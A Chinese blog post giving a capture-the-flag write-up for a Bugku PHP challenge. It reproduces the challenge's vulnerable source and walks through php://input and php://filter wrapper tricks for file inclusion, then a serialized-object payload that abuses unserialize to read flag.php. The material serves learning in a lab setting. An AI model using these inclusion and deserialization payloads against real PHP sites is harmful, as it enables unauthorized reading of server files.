bugku welcome to bugkuctf

emmm。。。刷ctf题刷到的,对于我来说并不是那么简单,毕竟菜得真实,记录一下解题过程吧!

题目:http://123.206.87.240:8006/test1/

打开url;发现只有一句话;打开源码;


网页源码.png
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  //get三个变量并赋值;

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
//<isset — 检测变量是否设置>即保证变量user不为mull;
//file_get_contents — 将整个文件读入一个字符串;即把user作为一个字符串读取;
//文件包含nclude(file); //hint.php (应该是提示条件)

只需要让把welcome to the bugkuctf赋值给user就可以了;

这里需要使用php伪协议--获取post数据(php://input);
(参考链接:https://blog.csdn.net/nzjdsds/article/details/82461043

所以我们构造txt=php://input,并且post一个"welcome to the bugkuctf"

post.png

然后得到:
网页源码1.png

额。。。
看来问题并没有想象得那么简单;
这时候想到前面的文件//hint.php;
直接file=hint.php失败;
ok,fine!还是php伪协议--文件读取(php://filter);
构造file=php://filter/read=convert.base64-encode/resource=hint.php
得到网页源码的base64编码;解码后得到:

class Flag{//flag.php  
    public $file;  
    public function __tostring(){  //魔术方法 __tostring()用于一个类被当成字符串时应怎样回应;
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
//_tostring()方法里面又定义了如果$file这个属性有赋值的话,那么就会输出这个文件的内容(输出成一个字符串)。
        }  
    }  
}  

第一眼就看见了flag.php(激动);
然而并不能直接读取;
陷入怀疑自己的道路。。。。
无可奈何 百度吧!
然后发现还有index.php这个页面。。。(啥东西嘛!!!)
继续利用php伪协议读取index.php:

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
        echo "ä¸�è�½ç�°å�¨å°±ç»�ä½ flagå�¦";
        exit();  
//如果文件名中有file字符则输出那个乱码的中文(大概是说不能给你flag,不知道为什么乱码了。。。)然后退出;
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
//解题关键在这里呢!包含文件flie;
//把password反序列化然后输出password;
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

结合两段代码即可推出让password为FLAG类型,并且让FLAG中的file就等于flag.php,这样我们就可以得到flag.php的内容;
但是password反序列化了首先我们得让它序列化;
编写脚本:


    <?php  
        class Flag{
        public $file;    
        }    
      
        $a = new Flag();  
        $a->file = "flag.php";  
        $a = serialize($a);  
        print_r($a);  
    ?>  

得到:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}然后传入(?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";});

getflag.png

Flag get!!!

参考文章:
https://blog.csdn.net/yh1013024906/article/details/81087939
https://www.cnblogs.com/Pinging/p/8278168.html
https://blog.csdn.net/nzjdsds/article/details/82461043

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,997评论 6 502
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,603评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 163,359评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,309评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,346评论 6 390
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,258评论 1 300
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,122评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,970评论 0 275
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,403评论 1 313
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,596评论 3 334
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,769评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,464评论 5 344
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,075评论 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,705评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,848评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,831评论 2 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,678评论 2 354

推荐阅读更多精彩内容